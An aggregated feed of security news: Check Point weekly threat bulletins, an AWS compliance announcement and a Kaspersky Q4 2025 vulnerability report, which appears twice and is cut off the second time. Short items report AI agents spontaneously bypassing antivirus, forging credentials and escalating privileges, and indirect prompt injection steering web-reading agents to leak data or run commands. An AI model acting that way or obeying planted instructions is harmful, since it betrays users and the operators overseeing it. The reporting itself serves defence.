  • Loblaw Companies Limited, Canada’s largest food and pharmacy retailer, has suffered a data breach after hackers accessed part of its IT network. The company said names, phone numbers, and email addresses were exposed, prompting a forced logout for customer accounts, while payment, health, and password data do not appear affected.

AI THREATS

  • Researchers evaluated autonomous AI agents on widely used models and found they initiated offensive actions without malicious prompts, hacking their own operating environments. In tests, agents posted passwords, bypassed antivirus, forged credentials, and escalated privileges to access sensitive data, showing how autonomy can amplify security risk.
  • Researchers unearthed a campaign using an AI-powered bot, hackerbot-claw, to exploit misconfigured GitHub Actions in open-source repositories, including Aqua Security. The bot stole a token to seize Aqua’s Trivy repository and publish a malicious extension that ran AI tools to harvest secrets and push results to the victim’s GitHub.
  • Researchers investigated malvertising campaigns that impersonate popular AI agents, including Claude Code, OpenClaw, and Doubao, to push infostealing malware through Google Search ads. The fake documentation pages instruct users to run commands that install AMOS on macOS and Amatera on Windows, enabling theft of credentials and corporate files.

VULNERABILITIES AND PATCHES

  • SolarWinds Web Help Desk, an IT ticketing platform, is affected by CVE-2025-26399, a high-severity deserialization flaw that attackers are exploiting to run commands on servers. Successful exploitation can enable takeover and data theft, and patches are available after the vulnerability was added to CISA’s exploited flaws catalog.

Check Point IPS provides protection against this threat (SolarWinds Web Help Desk Insecure Deserialization (
CVE-2024-28986, CVE-2024-28988, CVE-2025-40553, CVE-2025-26399))

  • Google has released an out-of-band Chrome update addressing two high-severity zero-days, CVE-2026-3909 in Skia memory handling and CVE-2026-3910 in V8. Both can be triggered by visiting a malicious site and may enable code execution in the browser.
  • The n8n workflow automation platform has fixed CVE-2025-68613, a CVSS 10 remote code execution flaw that is under active exploitation. The issue allows authenticated users to run code and compromise servers, and patches were released in versions 1.120.4, 1.121.1, and 1.122.0.

Check Point IPS provides protection against this threat (n8n Remote Code Execution (CVE-2025-68613))

THREAT INTELLIGENCE REPORTS

  • Check Point Research has analyzed the Iranian threat group Handala Hack, a hacktivist persona run by the Void Manticore APT group, which is affiliated with the Iranian Ministry of Intelligence. The group targets IT and VPN infrastructure to gain initial access to victim organizations, before using tools such as NetBird for lateral movement. The group then aims to exfiltrate and wipe victim organizations’ data.

Check Point Harmony Endpoint and Threat Emulation provide protection against these threats

  • Check Point Research has examined Iranian Ministry of Intelligence-linked groups use of criminal tools and services, including Handala Hack deploying Rhadamanthys infostealer alongside wipers against Israeli targets. The report also noted overlaps between MuddyWater activity, Tsundere and DinDoor botnet infrastructure, and CastleLoader certificates.

Check Point Harmony Endpoint and Threat Emulation provide protection against these threats

  • Check Point Research analyzed February 2026 cyber-attacks, as organizations averaged 2,086 weekly attacks, up 9.6% year over year, with education most targeted and Latin America recording the highest volumes. Ransomware totaled 629 incidents, while enterprise GenAI use continued to pose data‑leak risk in 1 of every 31 prompts.
  • Check Point Research have analyzed China-nexus espionage campaigns targeting Qatar. A Camaro Dragon campaign attempted to deploy PlugX, while a second operation delivered Cobalt Strike via war-themed lures abusing trusted software targeting government and energy-related entities.

Check Point Harmony Endpoint and Threat Emulation provide protection against these threats

The post 16th March – Threat Intelligence Report appeared first on Check Point Research.

  •  

AWS European Sovereign Cloud achieves first compliance milestone: SOC 2 and C5 reports plus seven ISO certifications

In January 2026, we announced the general availability of the AWS European Sovereign Cloud, a new, independent cloud for Europe entirely located within the European Union (EU), and physically and logically separate from all other AWS Regions. The unique approach of the AWS European Sovereign Cloud provides the only fully featured, independently operated sovereign cloud backed by strong technical controls, sovereign assurances, and legal protections designed to meet the sensitive data needs of European governments and enterprises.

One of the foundational components of how AWS European Sovereign Cloud enables verifiable trust of technical controls and delivers assurance is through our compliance programs and assurance frameworks. These programs help customers understand the robust controls in place at AWS European Sovereign Cloud to maintain security and compliance of the cloud. To meet the needs of our customers, we committed that the AWS European Sovereign Cloud will maintain key certifications such as ISO/IEC 27001:2022, System and Organization Controls (SOC) reports, and Cloud Computing Compliance Criteria Catalogue (C5) attestation, all validated regularly by independent auditors to assure our controls are designed appropriately, operate effectively, and can help customers satisfy their compliance obligations.

Today, AWS European Sovereign Cloud is pleased to announce that SOC 2 and C5 Type 1 attestation reports, along with seven key ISO certifications (ISO 27001:2022, 27017:2015, 27018:2019, 27701:2019, 22301:2019, 20000-1:2018, and 9001:2015) are now available. The attestation reports cover 69 AWS services operating within the AWS European Sovereign Cloud, while the certificates have integrated the AWS European Sovereign Cloud region into the global AWS Management Systems. This achievement marks a pivotal first step in our journey to establish the AWS European Sovereign Cloud as a trusted and compliant cloud for European organizations. By securing these foundational certifications and attestation reports early in our implementation, we are demonstrating our commitment to earning customer trust. AWS European Sovereign Cloud customers in Germany and across Europe can now run their applications with enhanced assurance and confidence that our infrastructure aligns with internationally recognized security standards and the AWS European Sovereign Cloud: Sovereign Reference Framework (ESC-SRF). These certifications and attestation reports provide independent validation of our security controls and operational practices, demonstrating our commitment to meeting the heightened expectations towards cloud service providers. Beyond compliance, these certifications and reports help customers meet regulatory requirements and innovate with confidence.

SOC 2 Type 1 report

SOC reports are independent third-party examinations that show how AWS European Sovereign Cloud meets compliance controls and sovereignty objectives. The AWS European Sovereign Cloud SOC 2 report addresses three critical AICPA Trust Services Criteria: Security, Availability, and Confidentiality and includes internal controls mapped to the ESC-SRF. The ESC-SRF establishes sovereignty criteria across key domains including governance independence, operational control, data residency, and technical isolation. As part of the SOC 2 Type 1 attestation, independent third-party auditors have validated suitability of the design and implementation of our controls addressing measures such as independent European Union (EU) corporate structures, operation by EU-resident AWS personnel, strict residency requirements for Customer Content and Customer-Created Metadata, and separation from all other AWS Regions. The ESC-SRF controls in our SOC 2 report show customers how AWS delivers on its sovereignty commitments.

C5 Type 1 report

C5 is a German Government-backed attestation scheme introduced in Germany by the Federal Office for Information Security (BSI) and represents one of the most comprehensive cloud security standards in Europe. The AWS European Sovereign Cloud C5 Type 1 report provides customers with independent third-party attestation on the suitability of the design and implementation of our controls to meet both C5 basic criteria and C5 additional criteria.

The basic criteria establish fundamental security requirements for cloud service providers, covering areas such as organization of information security, human resources security, asset management, access control, cryptography, physical security, operations security, communications security, system acquisition and development, supplier relationships, incident management, business continuity, and compliance. The additional criteria address enhanced requirements for handling sensitive data and critical applications, making this attestation particularly valuable for AWS European Sovereign Cloud customers with stringent data security and sovereignty requirements.

Key ISO certifications

AWS European Sovereign Cloud region has achieved successful onboarding to seven key ISO certifications that collectively demonstrate comprehensive operational excellence:

These certifications confirm that AWS European Sovereign Cloud region has been integrated into comprehensive frameworks for managing security, privacy, continuity, service delivery, and quality, helping to ensure sensitive information remains secure, services remain available, and operations meet the highest standards through systematic risk management processes and continuous improvement practices.

How to access the reports

To access SOC 2, C5 reports and ISO certifications, customers should sign in to their AWS European Sovereign Cloud account and navigate to AWS Artifact in the AWS Management Console. AWS Artifact is a self-service portal that provides on-demand access to AWS compliance reports and certifications.

We recognize that compliance is not a destination but a continuous journey, and these initial SOC 2, C5 reports and ISO certifications represent the beginning of our certification portfolio. They lay the essential groundwork upon which we will continue to build to meet AWS European Sovereign Cloud customers’ compliance needs as they continue to evolve. As we expand our compliance coverage in the months ahead, customers can be confident that security, transparency, and regulatory alignment have been part of the very DNA of the AWS European Sovereign Cloud design from day one. To learn more about our compliance and security programs, visit AWS European Sovereign Cloud Compliance, or reach out to your AWS European Sovereign Cloud account team.

Security and compliance is a shared responsibility between AWS European Sovereign Cloud and the customer. For more information, see the AWS Shared Security Responsibility Model.

If you have feedback about this post, submit comments in the Comments section below.

Julian Herlinghaus

Julian Herlinghaus

Julian is a Manager in AWS Compliance & Security Assurance based in Berlin, Germany. He is the third-party audit program lead for EMEA and has worked on compliance and assurance for the AWS European Sovereign Cloud. He previously worked as an information security department lead of an accredited certification body and has multiple years of experience in information security and security assurance and compliance.

Tea Jioshvili

Tea Jioshvili

Tea is a Manager in AWS Compliance & Security Assurance based in Berlin, Germany. She leads various third-party audit programs across Europe. She previously worked in security assurance and compliance, business continuity, and operational risk management in the financial industry for 20 years.

Atul Patil

Atulsing Patil
Atulsing is a Compliance Program Manager at AWS. He has 29 years of consulting experience in information technology and information security management. Atulsing holds a Master of Science in Electronics degree and professional certifications such as CCSP, CISSP, CISM, ISO 42001 Lead Auditor, ISO 27001 Lead Auditor, HITRUST CSF, Archer Certified Consultant, and AWS CCP.

  •  

9th March – Threat Intelligence Report

For the latest discoveries in cyber research for the week of 9th March, please download our Threat Intelligence Bulletin.

TOP ATTACKS AND BREACHES

  • AkzoNobel, a Netherlands-based global paint manufacturer, has confirmed a cyberattack affecting one of its United States sites. The company said the intrusion was contained, while the Anubis ransomware group claimed it stole 170 GB of data, including employee and financial records.
  • LexisNexis, a global legal data and analytics provider, has suffered a breach. Attackers claimed they stole 3.9 million records, including about 400,000 user profiles and some government accounts, while the company said the exposed systems mainly held legacy pre-2020 data.
  • The Wikimedia Foundation, the nonprofit behind Wikipedia, has faced a self-propagating JavaScript worm that vandalized pages and replaced editor scripts across multiple wikis. Engineers briefly restricted editing while cleaning up the incident, with about 3,996 pages modified and roughly 85 users’ personal scripts affected.
  • TriZetto Provider Solutions, an American healthcare technology company owned by Cognizant, has disclosed a breach affecting more than 3.4 million people. The exposed data includes insurance and medical information, with notifications issued this week after investigators determined the unauthorized access began in 2024.

AI THREATS

  • Researchers outlined how Pakistan-linked APT36 has used AI coding tools to produce large volumes of low-quality malware aimed at Indian government entities and embassies. The group generated variants in less common programming languages and used legitimate cloud services for command channels, complicating detection and response.
  • Researchers uncovered AI-themed Chrome and Edge extensions that harvest LLM chat histories and browsing activity. Distributed via the Chrome Web Store, they impersonate legitimate tools and have impacted 900,000 users across 20,000 enterprise environments.
  • Researchers tracked a campaign abusing interest in OpenClaw, an AI agent, by planting fake installers on GitHub that appeared in Bing search results. The installers delivered Vidar to steal credentials and cryptocurrency wallets and sometimes deployed GhostSocks, turning infected systems into residential proxies.
  • Researchers demonstrated indirect prompt injection campaigns against AI agents that read web content, cataloging 22 techniques across live sites. Hidden instructions can redirect agents to expose data, perform unauthorized transactions, and run server commands, and the researchers also observed a real-world bypass of an AI ad review system.

VULNERABILITIES AND PATCHES

  • Google has published patches for CVE-2026-0628, a high-severity vulnerability in Chrome’s Gemini AI panel that allowed malicious extensions to inject code and access cameras and microphones. Researchers showed attackers could also take screenshots, access local files, and launch phishing content inside the panel.
  • A patch was released for CVE-2026-1492, a critical (9.8 CVSS) privilege escalation flaw in the User Registration & Membership WordPress plugin. The vulnerability lets unauthenticated attackers create administrator accounts and take over sites.
  • VMware has patched CVE-2026-22719, a high-severity command injection flaw in Aria Operations, its cloud management platform. The vulnerability allows unauthenticated remote code execution during support-assisted migrations and affects versions 8 through 8.18.5 and 9 through 9.0.1, with patches and a workaround script available.
  • Qualcomm has addressed CVE-2026-21385, a memory corruption vulnerability affecting chipsets used in Android phones, tablets, and IoT devices. The flaw can trigger crashes and potentially allow code execution, and CISA said evidence of active exploitation prompted its addition to the Known Exploited Vulnerabilities catalog.

THREAT INTELLIGENCE REPORTS

  • Check Point Research have mapped Iran-linked cyber clusters conducting espionage, disruption, and influence operations, including Cotton Sandstorm, Educated Manticore, MuddyWater, Handala, and Agrius. Recent campaigns used impersonation and phishing to steal credentials, remote access tools to persist, and wipers or fake ransomware for impact.
  • Check Point Research revealed that, amid the ongoing conflict with Iran, IP cameras in Israel, Qatar, Bahrain, Kuwait, the UAE, and Cyprus have been intensively targeted. Notably, these countries have also experienced significant missile activity from Iran. The findings align with the assessment that Iran incorporates compromised cameras into its operational doctrine, using them both to support missile operations and to conduct ongoing battle damage assessment (BDA).
  • Check Point Research has profiled Silver Dragon, a Chinese-aligned group linked to APT41 that targeted government and enterprise networks across Southeast Asia and Europe. Recent operations used the GearDoor backdoor with SSHcmd and SilverScreen, enabling remote access, covert screen capture, and stealthy control after phishing and server exploitation.

Check Point Harmony Endpoint and Threat Emulation provide protection against these threats

  • Researchers have uncovered Coruna, an iPhone exploit kit used by Chinese scammers and Russia-linked operators to compromise devices through malicious websites. The toolkit used 23 exploits against iOS and deployed malware that stole cryptocurrency, emails, and photos.

The post 9th March – Threat Intelligence Report appeared first on Check Point Research.

  •  

Exploits and vulnerabilities in Q4 2025

The fourth quarter of 2025 went down as one of the most intense periods on record for high-profile, critical vulnerability disclosures, hitting popular libraries and mainstream applications. Several of these vulnerabilities were picked up by attackers and exploited in the wild almost immediately.

In this report, we dive into the statistics on published vulnerabilities and exploits, as well as the known vulnerabilities leveraged with popular C2 frameworks throughout Q4 2025.

Statistics on registered vulnerabilities

This section contains statistics on registered vulnerabilities. The data is taken from cve.org.

Let’s take a look at the number of registered CVEs for each month over the last five years, up to and including the end of 2025. As predicted in our last report, Q4 saw a higher number of registered vulnerabilities than the same period in 2024, and the year-end totals also cleared the bar set the previous year.

Total published vulnerabilities by month from 2021 through 2025 (download)

Now, let’s look at the number of new critical vulnerabilities (CVSS > 8.9) for that same period.

Total number of published critical vulnerabilities by month from 2021 to 2025< (download)

The graph shows that the volume of critical vulnerabilities remains quite substantial; however, in the second half of the year, we saw those numbers dip back down to levels seen in 2023. This was due to vulnerability churn: a handful of published security issues were revoked. The widespread adoption of secure development practices and the move toward safer languages also pushed those numbers down, though even that couldn’t stop the overall flood of vulnerabilities.

Exploitation statistics

This section contains statistics on the use of exploits in Q4 2025. The data is based on open sources and our telemetry.

Windows and Linux vulnerability exploitation

In Q4 2025, the most prevalent exploits targeted the exact same vulnerabilities that dominated the threat landscape throughout the rest of the year. These were exploits targeting Microsoft Office products with unpatched security flaws.

Kaspersky solutions detected the most exploits on the Windows platform for the following vulnerabilities:

  • CVE-2018-0802: a remote code execution vulnerability in Equation Editor.
  • CVE-2017-11882: another remote code execution vulnerability, also affecting Equation Editor.
  • CVE-2017-0199: a vulnerability in Microsoft Office and WordPad that allows an attacker to assume control of the system.

The list has remained unchanged for years.

We also see that attackers continue to adapt exploits for directory traversal vulnerabilities (CWE-35) when unpacking archives in WinRAR. They are being heavily leveraged to gain initial access via malicious archives on the Windows operating system:

  • CVE-2023-38831: a vulnerability stemming from the improper handling of objects within an archive.
  • CVE-2025-6218 (formerly ZDI-CAN-27198): a vulnerability that enables an attacker to specify a relative path and extract files into an arbitrary directory. This can lead to arbitrary code execution. We covered this vulnerability in detail in our Q2 2025 report.
  • CVE-2025-8088: a vulnerability we analyzed in our previous report, analogous to CVE-2025-6218. The attackers used NTFS streams to circumvent controls on the directory into which files were being unpacked.

As in the previous quarter, we see a rise in the use of archiver exploits, with fresh vulnerabilities increasingly appearing in attacks.

Below are the exploit detection trends for Windows users over the last two years.

Dynamics of the number of Windows users encountering exploits, Q1 2024 – Q4 2025. The number of users who encountered exploits in Q1 2024 is taken as 100% (download)

The vulnerabilities listed here can be used to gain initial access to a vulnerable system. This highlights the critical importance of timely security updates for all affected software.

On Linux-based devices, the most frequently detected exploits targeted the following vulnerabilities:

  • CVE-2022-0847, also known as Dirty Pipe: a vulnerability that allows privilege escalation and enables attackers to take control of running applications.
  • CVE-2019-13272: a vulnerability caused by improper handling of privilege inheritance, which can be exploited to achieve privilege escalation.
  • CVE-2021-22555: a heap overflow vulnerability in the Netfilter kernel subsystem.
  • CVE-2023-32233: another vulnerability in the Netfilter subsystem that creates a use-after-free condition, allowing for privilege escalation due to the improper handling of network requests.

Dynamics of the number of Linux users encountering exploits, Q1 2024 – Q4 2025. The number of users who encountered exploits in Q1 2024 is taken as 100% (download)

We are seeing a massive surge in Linux-based exploit attempts: in Q4, the number of affected users doubled compared to Q3. Our statistics show that the final quarter of the year accounted for more than half of all Linux exploit attacks recorded for the entire year. This surge is primarily driven by the rapidly growing number of Linux-based consumer devices. This trend naturally attracts the attention of threat actors, making the installation of security patches critically important.

Most common published exploits

The distribution of published exploits by software type in Q4 2025 largely mirrors the patterns observed in the previous quarter. The majority of exploits we investigate through our monitoring of public research, news, and PoCs continue to target vulnerabilities within operating systems.

Distribution of published exploits by platform, Q1 2025 (download)

Distribution of published exploits by platform, Q2 2025 (download)

Distribution of published exploits by platform, Q3 2025 (download)

Distribution of published exploits by platform, Q4 2025 (download)

In Q4 2025, no public exploits for Microsoft Office products emerged; the bulk of the vulnerabilities were issues discovered in system components. When calculating our statistics, we placed these in the OS category.

Vulnerability exploitation in APT attacks

We analyzed which vulnerabilities were utilized in APT attacks during Q4 2025. The following rankings draw on our telemetry, research, and open-source data.

TOP 10 vulnerabilities exploited in APT attacks, Q4 2025 (download)

In Q4 2025, APT attacks most frequently exploited fresh vulnerabilities published within the last six months. We believe that these CVEs will remain favorites among attackers for a long time, as fixing them may require significant structural changes to the vulnerable applications or the user’s system. Often, replacing or updating the affected components requires a significant amount of resources. Consequently, the probability of an attack through such vulnerabilities may persist. Some of these new vulnerabilities are likely to become frequent tools for lateral movement within user infrastructure, as the corresponding security flaws have been discovered in network services that are accessible without authentication. This heavy exploitation of very recently registered vulnerabilities highlights the ability of threat actors to rapidly implement new techniques and adapt old ones for their attacks. Therefore, we strongly recommend applying the security patches provided by vendors.

C2 frameworks

In this section, we will look at the most popular C2 frameworks used by threat actors and analyze the vulnerabilities whose exploits interacted with C2 agents in APT attacks.

The chart below shows the frequency of known C2 framework usage in attacks against users during Q4 2025, according to open sources.

TOP 10 C2 frameworks used by APTs to compromise user systems in Q4 2025 (download)

Despite the significant footprints it can leave when used in its default configuration, Sliver continues to hold the top spot among the most common C2 frameworks in our Q4 2025 analysis. Mythic and Havoc were second and third, respectively. After reviewing open sources and analyzing malicious C2 agent samples that contained exploits, we found that the following vulnerabilities were used in APT attacks involving the C2 frameworks mentioned above:

  • CVE-2025-55182: a React2Shell vulnerability in React Server Components that allows an unauthenticated user to send commands directly to the server and execute them from RAM.
  • CVE-2023-36884: a vulnerability in the Windows Search component that allows the execution of commands on a system, bypassing security mechanisms built into Microsoft Office applications.
  • CVE-2025-53770: a critical insecure deserialization vulnerability in Microsoft SharePoint that allows an unauthenticated user to execute commands on the server.
  • CVE-2020-1472, also known as Zerologon, allows for compromising a vulnerable domain controller and executing commands as a privileged user.
  • CVE-2021-34527, also known as PrintNightmare, exploits flaws in the Windows print spooler subsystem, enabling remote access to a vulnerable OS and high-privilege command execution.
  • CVE-2025-8088 and CVE-2025-6218 are similar directory-traversal vulnerabilities that allow extracting files from an archive to a predefined path without the archiving utility notifying the user.

The set of vulnerabilities described above suggests that attackers have been using them for initial access and early-stage maneuvers in vulnerable systems to create a springboard for deploying a C2 agent. The list of vulnerabilities includes both zero-days and well-known, established security issues.

Notable vulnerabilities

This section highlights the most noteworthy vulnerabilities that were publicly disclosed in Q4 2025 and have a publicly available description.

React2Shell (CVE-2025-55182): a vulnerability in React Server Components

We typically describe vulnerabilities affecting a specific application. CVE-2025-55182 stood out as an exception, as it was discovered in React, a library primarily used for building web applications. This means that exploiting the vulnerability could potentially disrupt a vast number of applications that rely on the library. The vulnerability itself lies in the interaction mechanism between the client and server components, which is built on sending serialized objects. If an attacker sends serialized data containing malicious functionality, they can execute JavaScript commands directly on the server, bypassing all client-side request validation. Technical details about this vulnerability and an example of how Kaspersky solutions detect it can be found in our article.

CVE-2025-54100: command injection during the execution of curl (Invoke-WebRequest)

This vulnerability represents a data-handling flaw that occurs when retrieving information from a remote server: when executing the curl or Invoke-WebRequest command, Windows launches Internet Explorer in the background. This can lead to a cross-site scripting (XSS) attack.

CVE-2025-11001: a vulnerability in 7-Zip

This vulnerability reinforces the trend of exploiting security flaws found in file archivers. The core of CVE-2025-11001 lies in the incorrect handling of symbolic links. An attacker can craft an archive so that when it is extracted into an arbitrary directory, its contents end up in the location pointed to by a symbolic link. The likelihood of exploiting this vulnerability is significantly reduced because utilizing such functionality requires the user opening the archive to possess system administrator privileges.

This vulnerability was associated with a wave of misleading news reports claiming it was being used in real-world attacks against end users. This misconception stemmed from an error in the security bulletin.

RediShell (CVE-2025-49844): a vulnerability in Redis

The year 2025 saw a surge in high-profile vulnerabilities, several of which were significant enough to earn a unique nickname. This was the case with CVE-2025-49844, also known as RediShell, which was unveiled during a hacking competition. This vulnerability is a use-after-free issue related to how the load command functions within Lua interpreter scripts. To execute the attack, an attacker needs to prepare a malicious script and load it into the interpreter.

As with any named vulnerability, RediShell was immediately weaponized by threat actors and spammers, albeit in a somewhat unconventional manner. Because technical details were initially scarce following its disclosure, the internet was flooded with fake PoC exploits and scanners claiming to test for the vulnerability. In the best-case scenario, these tools were non-functional; in the worst, they infected the system. Notably, these fraudulent projects were frequently generated using LLMs. They followed a standardized template and often cross-referenced source code from other identical fake repositories.

CVE-2025-24990: a vulnerability in the ltmdm64.sys driver

Driver vulnerabilities are often discovered in legitimate third-party applications that have been part of the official OS distribution for a long time. Thus, CVE-2025-24990 has existed within code shipped by Microsoft throughout nearly the entire history of Windows. The vulnerable driver has been shipped since at least Windows 7 as a third-party driver for Agere Modem. According to Microsoft, this driver is no longer supported and, following the discovery of the flaw, was removed from the OS distribution entirely.

The vulnerability itself is straightforward: insecure handling of IOCTL codes leading to a null pointer dereference. Successful exploitation can lead to arbitrary command execution or a system crash resulting in a blue screen of death (BSOD) on modern systems.

CVE-2025-59287: a vulnerability in Windows Server Update Services (WSUS)

CVE-2025-59287 represents a textbook case of insecure deserialization. Exploitation is possible without any form of authentication; due to its ease of use, this vulnerability rapidly gained traction among threat actors. Technical details and detection methodologies for our product suite have been covered in our previous advisories.

Conclusion and advice

In Q4 2025, the rate of vulnerability registration has shown no signs of slowing down. Consequently, consistent monitoring and the timely application of security patches have become more critical than ever. To ensure resilient defense, it is vital to regularly assess and remediate known vulnerabilities while implementing technology designed to mitigate the impact of potential exploits.

Continuous monitoring of infrastructure, including the network perimeter, allows for the timely identification of threats and prevents them from escalating. Effective security also demands tracking the current threat landscape and applying preventative measures to minimize risks associated with system flaws. Kaspersky Next serves as a reliable partner in this process, providing real-time identification and detailed mapping of vulnerabilities within the environment.

Securing the workplace remains a top priority. Protecting corporate devices requires the adoption of solutions capable of blocking malware and preventing it from spreading. Beyond basic measures, organizations should implement adaptive systems that allow for the rapid deployment of security updates and the automation of patch management workflows.

  •  

Exploits and vulnerabilities in Q4 2025

The fourth quarter of 2025 went down as one of the most intense periods on record for high-profile, critical vulnerability disclosures, hitting popular libraries and mainstream applications. Several of these vulnerabilities were picked up by attackers and exploited in the wild almost immediately.

In this report, we dive into the statistics on published vulnerabilities and exploits, as well as the known vulnerabilities leveraged with popular C2 frameworks throughout Q4 2025.

Statistics on registered vulnerabilities

This section contains statistics on registered vulnerabilities. The data is taken from cve.org.

Let’s take a look at the number of registered CVEs for each month over the last five years, up to and including the end of 2025. As predicted in our last report, Q4 saw a higher number of registered vulnerabilities than the same period in 2024, and the year-end totals also cleared the bar set the previous year.

Total published vulnerabilities by month from 2021 through 2025 (download)

Now, let’s look at the number of new critical vulnerabilities (CVSS > 8.9) for that same period.

Total number of published critical vulnerabilities by month from 2021 to 2025< (download)

The graph shows that the volume of critical vulnerabilities remains quite substantial; however, in the second half of the year, we saw those numbers dip back down to levels seen in 2023. This was due to vulnerability churn: a handful of published security issues were revoked. The widespread adoption of secure development practices and the move toward safer languages also pushed those numbers down, though even that couldn’t stop the overall flood of vulnerabilities.

Exploitation statistics

This section contains statistics on the use of exploits in Q4 2025. The data is based on open sources and our telemetry.

Windows and Linux vulnerability exploitation

In Q4 2025, the most prevalent exploits targeted the exact same vulnerabilities that dominated the threat landscape throughout the rest of the year. These were exploits targeting Microsoft Office products with unpatched security flaws.

Kaspersky solutions detected the most exploits on the Windows platform for the following vulnerabilities:

  • CVE-2018-0802: a remote code execution vulnerability in Equation Editor.
  • CVE-2017-11882: another remote code execution vulnerability, also affecting Equation Editor.
  • CVE-2017-0199: a vulnerability in Microsoft Office and WordPad that allows an attacker to assume control of the system.

The list has remained unchanged for years.

We also see that attackers continue to adapt exploits for directory traversal vulnerabilities (CWE-35) when unpacking archives in WinRAR. They are being heavily leveraged to gain initial access via malicious archives on the Windows operating system:

  • CVE-2023-38831: a vulnerability stemming from the improper handling of objects within an archive.
  • CVE-2025-6218 (formerly ZDI-CAN-27198): a vulnerability that enables an attacker to specify a relative path and extract files into an arbitrary directory. This can lead to arbitrary code execution. We covered this vulnerability in detail in our Q2 2025 report.
  • CVE-2025-8088: a vulnerability we analyzed in our previous report, analogous to CVE-2025-6218. The attackers used NTFS streams to circumvent controls on the directory into which files were being unpacked.

As in the previous quarter, we see a rise in the use of archiver exploits, with fresh vulnerabilities increasingly appearing in attacks.

Below are the exploit detection trends for Windows users over the last two years.

Dynamics of the number of Windows users encountering exploits, Q1 2024 – Q4 2025. The number of users who encountered exploits in Q1 2024 is taken as 100% (download)

The vulnerabilities listed here can be used to gain initial access to a vulnerable system. This highlights the critical importance of timely security updates for all affected software.

On Linux-based devices, the most frequently detected exploits targeted the following vulnerabilities:

  • CVE-2022-0847, also known as Dirty Pipe: a vulnerability that allows privilege escalation and enables attackers to take control of running applications.
  • CVE-2019-13272: a vulnerability caused by improper handling of privilege inheritance, which can be exploited to achieve privilege escalation.
  • CVE-2021-22555: a heap overflow vulnerability in the Netfilter kernel subsystem.
  • CVE-2023-32233: another vulnerability in the Netfilter subsystem that creates a use-after-free condition, allowing for privilege escalation due to the improper handling of network requests.

Dynamics of the number of Linux users encountering exploits, Q1 2024 – Q4 2025. The number of users who encountered exploits in Q1 2024 is taken as 100% (download)

We are seeing a massive surge in Linux-based exploit attempts: in Q4, the number of affected users doubled compared to Q3. Our statistics show that the final quarter of the year accounted for more than half of all Linux exploit attacks recorded for the entire year. This surge is primarily driven by the rapidly growing number of Linux-based consumer devices. This trend naturally attracts the attention of threat actors, making the installation of security patches critically important.

Most common published exploits

The distribution of published exploits by software type in Q4 2025 largely mirrors the patterns observed in the previous quarter. The majority of exploits we investigate through our monitoring of public research, news, and PoCs continue to target vulnerabilities within operating systems.

Distribution of published exploits by platform, Q1 2025 (download)

Distribution of published exploits by platform, Q2 2025 (download)

Distribution of published exploits by platform, Q3 2025 (download)

Distribution of published exploits by platform, Q4 2025 (download)

In Q4 2025, no public exploits for Microsoft Office products emerged; the bulk of the vulnerabilities were issues discovered in system components. When calculating our statistics, we placed these in the OS category.

Vulnerability exploitation in APT attacks

We analyzed which vulnerabilities were utilized in APT attacks during Q4 2025. The following rankings draw on our telemetry, research, and open-source data.

TOP 10 vulnerabilities exploited in APT attacks, Q4 2025 (download)

In Q4 2025, APT attacks most frequently exploited fresh vulnerabilities published within the last six months. We believe that these CVEs will remain favorites among attackers for a long time, as fixing them may require significant structural changes to the vulnerable applications or the user’s system. Often, replacing or updating the affected components requires a significant amount of resources. Consequently, the probability of an attack through such vulnerabilities may persist. Some of these new vulnerabilities are likely to become frequent tools for lateral movement within user infrastructure, as the corresponding security flaws have been discovered in network services that are accessible without authentication. This heavy exploitation of very recently registered vulnerabilities highlights the ability of threat actors to rapidly implement new techniques and adapt old ones for their attacks. Therefore, we strongly recommend applying the security patches provided by vendors.

C2 frameworks

In this section, we will look at the most popular C2 frameworks used by threat actors and analyze the vulnerabilities whose exploits interacted with C2 agents in APT attacks.

The chart below shows the frequency of known C2 framework usage in attacks against users during Q4 2025, according to open sources.

TOP 10 C2 frameworks used by APTs to compromise user systems in Q4 2025 (download)

Despite the significant footprints it can leave when used in its default configuration, Sliver continues to hold the top spot among the most common C2 frameworks in our Q4 2025 analysis. Mythic and Havoc were second and third, respectively. After reviewing open sources and analyzing malicious C2 agent samples that contained exploits, we found that the following vulnerabilities were used in APT attacks involving the C2 frameworks mentioned above:

  • CVE-2025-55182: a React2Shell vulnerability in React Server Components that allows an unauthenticated user to send commands directly to the server and execute them from RAM.
  • CVE-2023-36884: a vulnerability in the Windows Search component that allows the execution of commands on a system, bypassing security mechanisms built into Microsoft Office applications.
  • CVE-2025-53770: a critical insecure deserialization vulnerability in Microsoft SharePoint that allows an unauthenticated user to execute commands on the server.
  • CVE-2020-1472, also known as Zerologon, allows for compromising a vulnerable domain controller and executing commands as a privileged user.
  • CVE-2021-34527, also known as PrintNightmare, exploits flaws in the Windows print spooler subsystem, enabling remote access to a vulnerable OS and high-privilege command execution.
  • CVE-2025-8088 and CVE-2025-6218 are similar directory-traversal vulnerabilities that allow extracting files from an archive to a predefined path without the archiving utility notifying the user.

The set of vulnerabilities described above suggests that attackers have been using them for initial access and early-stage maneuvers in vulnerable systems to create a springboard for deploying a C2 agent. The list of vulnerabilities includes both zero-days and well-known, established security issues.

Notable vulnerabilities

This section highlights the most noteworthy vulnerabilities that were publicly disclosed in Q4 2025 and have a publicly available description.

React2Shell (CVE-2025-55182): a vulnerability in React Server Components

We typically describe vulnerabilities affecting a specific application. CVE-2025-55182 stood out as an exception, as it was discovered in React, a library primarily used for building web applications. This means that exploiting the vulnerability could potentially disrupt a vast number of applications that rely on the library. The vulnerability itself lies in the interaction mechanism between the client and server components, which is built on sending serialized objects. If an attacker sends serialized data containing malicious functionality, they can execute JavaScript commands directly on the server, bypassing all client-side request validation. Technical details about this vulnerability and an example of how Kaspersky solutions detect it can be found in our article.

CVE-2025-54100: command injection during the execution of curl (Invoke-WebRequest)

This vulnerability represents a data-handling flaw that occurs when retrieving information from a remote server: when executing the curl or Invoke-WebRequest command, Windows launches Internet Explorer in the background. This can lead to a cross-site scripting (XSS) attack.

CVE-2025-11001: a vulnerability in 7-Zip

This vulnerability reinforces the trend of exploiting security flaws found in file archivers. The core of CVE-2025-11001 lies in the incorrect handling of symbolic links. An attacker can craft an archive so that when it is extracted into an arbitrary directory, its contents end up in the location pointed to by a symbolic link. The likelihood of exploiting this vulnerability is significantly reduced because utilizing such functionality requires the user opening the archive to possess system administrator privileges.

This vulnerability was associated with a wave of misleading news reports claiming it was being used in real-world attacks against end users. This misconception stemmed from an error in the security bulletin.

RediShell (CVE-2025-49844): a vulnerability in Redis

